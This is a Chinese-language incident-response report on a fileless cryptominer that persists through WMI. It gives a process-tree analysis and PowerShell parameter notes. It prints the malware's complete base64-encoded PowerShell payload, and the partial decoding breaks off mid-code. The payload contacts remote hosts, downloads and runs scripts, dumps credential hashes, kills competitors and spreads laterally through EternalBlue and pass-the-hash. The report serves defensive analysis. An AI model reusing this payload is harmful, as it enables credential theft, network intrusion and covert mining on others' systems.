无文件挖矿应急响应处置报告

会员服务 ·

无文件挖矿应急响应处置报告

2019 年 7 月 5 日 FreeBuf

一、情况概述

1.1 情况拓扑

由于运维过程中可能存在违规操作、过失操作或者防护能力不足导致被恶意操作使得主机遭受挖矿程序的侵害，该挖矿程序会下载恶意程序至WMI中，实现无文件挖矿和内网渗透，并下载DDOS攻击程序和通过任务计划每隔20分钟自动生成版本校验恶意程序。

1.2 情况简介

2019年4月4日收到用户告警，内网主机存在CPU过高现象，同时网络异常监测预警平台告警内网主机有主动连接矿池行为。

1.3 分析思路

挖矿程序如要体现出长久稳定的产出货币价值，其基础功能实现、长期运行、自我隐藏和自我传播的基本特性必不可少。遂根据恶意人员的攻击基本意图进行分析：

1.检查挖矿运行过程；

2.检查其自我传播的方式方法；

3.检查其如何长期运行；

4.检查其如何渗透至操作系统中；

尝试通过分析以上过程，从而闭环各个恶意环节的攻击流程。

二、主机挖矿行为分析处置

2.1 现状描述

该主机CPU使用率75%：Powershell.exe占用CPU较高，对其进行检查。

2.2 父子进程对应表

wmic process得到的相关进程名、父进程、子进程经梳理后对应表如下所示：

Caption	ParentProcessId	ProcessId
wininit.exe	348	388
services.exe	388	504
svchost.exe	504	624
WmiPrvSE.exe	624	5148
powershell.exe	5148	3964
powershell.exe	3964	3180

各程序CommandLine详见后续。

2.3 wininit.exe

CommandLine：wininit.exe

Windows启动应用程序。用于启动services.exe(服务控制管理器)、lsass.exe(本地安全授权)、lsm.exe(本地会话管理器)。

2.4 services.exe

CommandLine：C:\Windows\system32\services.exe

Windows服务管理应用程序。

2.5 svchost.exe

CommandLine：C:\Windows\system32\svchost.exe-k DcomLaunch

DCOMLAUNCH服务可启动COM和DCOM服务器，以响应对象激活请求。

2.6 WmiPrvSE.exe

CommandLine：C:\Windows\system32\wbem\wmiprvse.exe

wmiprvse.exe是微软Windows操作系统的一部分，用于通过WinMgmt.exe程序处理WMI操作。

2.7 powershell.exe（PID 3964）

CommandLine：powershell.exe-NoP -NonI -W Hidden -E

  
  
    
   
   
     
    
    
      
   
   
     
   
   
     JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQAxADEALgA5ADAALgAxADQANQAuADUAMgAnACkALAAoACcAMQA4ADUALgAyADMANAAuADIAMQA3AC4AMQAzADkAJwApACkADQAKACQAYQB2AGcAcwAgAD0AIABAACgAKQANAAoAJABuAGkAYwAgAD0AIAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAzADsAJABpACsAKwApAHsADQAKAAkAJABzAHUAbQAgAD0AIAAwAA0ACgAJACQAYwBvAHUAbgB0ACAAPQAgADAADQAKAAkAZgBvAHIAKAAkAGoAPQAxADsAJABqACAALQBsAGUAIAA0ADsAJABqACsAKwApAHsADQAKAAkACQAkAHQAbQBwACAAPQAgACgAJABwAGkAbgAuAHMAZQBuAGQAKAAkAHMAZQBbACQAaQBdACkAKQAuAFIAbwB1AG4AZAB0AHIAaQBwAFQAaQBtAGUADQAKAAkACQBpAGYAIAAoACQAdABtAHAAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAJACQAYwBvAHUAbgB0ACAAKwA9ACAAMQANAAoACQAJAH0ADQAKAAkACQAkAHMAdQBtACAAKwA9ACAAJAB0AG0AcAANAAoACQB9AA0ACgAJAGkAZgAgACgAJABjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAkAGEAdgBnAHMAIAArAD0AIAAkAHMAdQBtAC8AJABjAG8AdQBuAHQADQAKAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJACQAYQB2AGcAcwAgACsAPQAgADAADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMAApAHsADQAKAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAzADAAMAApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMABdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADEAKQB7AA0ACgAJAAkAaQBmACAAKAAkAGEAdgBnAHMAWwAxAF0AIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAkAGEAdgBnAHMAWwAxAF0AKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADEAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADIAKQB7AA0ACgAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAMwAwADAAKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkAfQANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAzACkAewANAAoACQAJAGkAZgAgACgAJABhAHYAZwBzAFsAMwBdACAALQBuAGUAIAAwACkAewANAAoACQAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAJABhAHYAZwBzAFsAMwBdACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0AZQBsAHMAZQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAzAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACgAJwA6ACcAKwAnADQANAAzACcAKQANAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdgBlAHIALgB0AHgAdAAiACkALgBUAHIAaQBtACgAKQANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewANAAoAIAAgACAAIAAkAHYAZQByAF8AdABtAHAAPQAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwB2AGUAcgAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJAB2AGUAcgBfAHQAbQBwACkAewANAAoAIAAgACAAIAAgACAAIAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvACQAbgBpAGMALwBhAG4AdABpAHYAaQByAHUAcwAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACQAcwB0AGkAbQBlAD0AWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQADQAKACQAZgB1AG4AcwAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQANAAoAJABkAGUAZgB1AG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAdQBuAHMAKQApAA0ACgBpAGUAeAAgACQAZABlAGYAdQBuAA0ACgANAAoARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBmAGkAbAB0AGUAcgAgAC0AbgBvAHQAbQBhAHQAYwBoACAAJwBXAGkAbgBkAG8AdwBzACAARQB2AGUAbgB0AHMAJwB9ACAAfABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0AA0ACgANAAoADQAKAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAPQAgAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAB8AHMAbwByAHQAIABjAHAAdQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBpAGQAfQANAAoAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoAJABlAHgAaQBzAHQAPQAkAEYAYQBsAHMAZQANAAoAaQBmACAAKAAkAHAAcwBpAGQAcwAgAC0AbgBlACAAJABuAHUAbABsACAAKQANAAoAewANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAcABzAGkAZABzACAALQBjAG8AbgB0AGEAaQBuAHMAIAAkAGwAaQBuAGUAWwAtADEAXQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADAAIAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAxADQANAA0ADQAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAFIAdQBuAEQARABPAFMAIAAiAGMAbwBoAGUAcgBuAGUAYwBlAC4AZQB4AGUAIgANAAoASwBpAGwAbABCAG8AdAAoACcAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADcANwA3ADcAIgApACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7AA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlACAAOwBpAGUAeAAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAYAAkAGYAdQBuAHMAKQApACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAgAC0AUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAAYAAkAFIAZQBtAG8AdABlAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAYAAkAG0AbwBuACwAIABgACQAbQBvAG4ALAAgACcAVgBvAGkAZAAnACwAIAAwACwAIAAnACcALAAgACcAJwApAGAAIgAiAA0ACgAgACAAIAAgACQAdgBiAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAA0ACgAgACAAIAAgACQAdgBiAHMALgByAHUAbgAoACQAYwBtAGQAbQBvAG4ALAAwACkADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AaQBtAGkAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKAGkAZgAgACgAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0ALgBsAGUAbgBnAHQAaAAgAC0AbgBlACAAMwAyACkADQAKAHsADQAKACAAIAAgACAAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0AIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABhAHMAYwBpAGkAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYQAyADUAaABZADIAdABsAGMAbQBWAGsALgB0AHgAdAAiAA0ACgB9AA0ACgANAAoAJABOAGUAdAB3AG8AcgBrAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAbgB1AGwAbAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQBwAHMAdQAnAF0ALgBWAGEAbAB1AGUADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHMAYwAnAF0ALgBWAGEAbAB1AGUADQAKAFsAYgB5AHQAZQBbAF0AXQAkAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAYwBiAGEAKQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQANAAoAewANAAoADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAUABBAGQAZAByAGUAcwBzAFQAbwBTAHQAcgBpAG4AZwANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACQAUwB1AGIAbgBlAHQATQBhAHMAawAgACAAPQAgACcAMgA1ADUALgAyADUANQAuADIANQA1AC4AMAAnAA0ACgAgACAAIAAgACQAaQBwAHMAXwBjAD0ARwBlAHQALQBuAGUAdAB3AG8AcgBrAHIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKACAAIAAgACAAJABpAHAAcwBfAGIAPQBHAGUAdAAtAEkAcABJAG4AQgAgACQASQBQAEEAZABkAHIAZQBzAHMADQAKACAAIAAgACAAJABpAHAAcwA9ACQAaQBwAHMAXwBjACsAJABpAHAAcwBfAGIADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQBpAGYAIAAoACQAbABpAG4AZQAuAGMAbwB1AG4AdAAgAC0AbABlACAANAApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQAkAGkAPQAkAGwAaQBuAGUAWwAtADMAXQAuAHMAcABsAGkAdAAoACcAOgAnACkAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACAAKAAkAGwAaQBuAGUAWwAtADIAXQAgAC0AZQBxACAAJwBFAFMAVABBAEIATABJAFMASABFAEQAJwApACAALQBhAG4AZAAgACAAKAAkAGkAIAAtAG4AZQAgACcAMQAyADcALgAwAC4AMAAuADEAJwApACAALQBhAG4AZAAgACgAJABpAHAAcwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAKwA9ACQAaQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABpAHAAIABpAG4AIAAkAGkAcABzACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAHAAIAAtAGUAcQAgACQASQBQAEEAZABkAHIAZQBzAHMAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkACQAJAGkAZgAgACgAKABUAGUAcwB0AC0AUABvAHIAdAAgACQAaQBwACkAIAAtAG4AZQAgACQAZgBhAGwAcwBlACAALQBhAG4AZAAgACQAaQBwAHMAdQAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAcgBlAHMAPQBlAGIANwAgACQAaQBwACAAJABzAGMADQAKAAkACQAJAAkACQBpAGYAIAAoACEAKAAkAHIAZQBzACAALQBlAHEAIAAkAHQAcgB1AGUAKQApAA0ACgAJAAkACQAJAAkAewBlAGIAOAAgACQAaQBwACAAJABzAGMAfQANAAoACQAJAAkACQAJACQAaQAxADcAIAA9ACAAJABpADEANwAgACsAIAAiACAAIgArACQAaQBwAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAfQANAAoADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==

powershell.exe是一种命令行外壳程序和脚本环境。参数简介如下所示：

序号	参数	简介
1	-NoP	不加载Windows PowerShell配置文件
2	-NonI	命令行运行后不和用户进行交互
3	-W Hidden	将命令行运行窗口隐藏
4	-E	接受base-64编码字符串版本的命令

个人不会代码，所以对上述base64字符串进行解码并添加代码块简意是连蒙带猜的，主要表达其中有部分内容将下一步工作指向WMI，如上所述在应急过程中进行是最好的，我当时是根据关键字查找大牛已经写过的材料进行下一步工作：

$pin = new-object system.net.networkinformation.ping$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))$avgs = @()$nic = 'update.7h4uk.com'for($i=0;$i -le 3;$i++){    $sum = 0    $count = 0//判断服务端是否在线和延时情况以连接对应的域名或IP    for($j=1;$j -le 4;$j++){        $tmp =($pin.send($se[$i])).RoundtripTime        if ($tmp -ne 0){                $count += 1        }        $sum += $tmp    }    if ($count -ne 0){            $avgs += $sum/$count    }else{            $avgs += 0    }    if ($i -eq 0){        if (($avgs[0] -le 300) -and($avgs[0] -ne 0)){            $nic = $se[0]            break        }    }    if ($i -eq 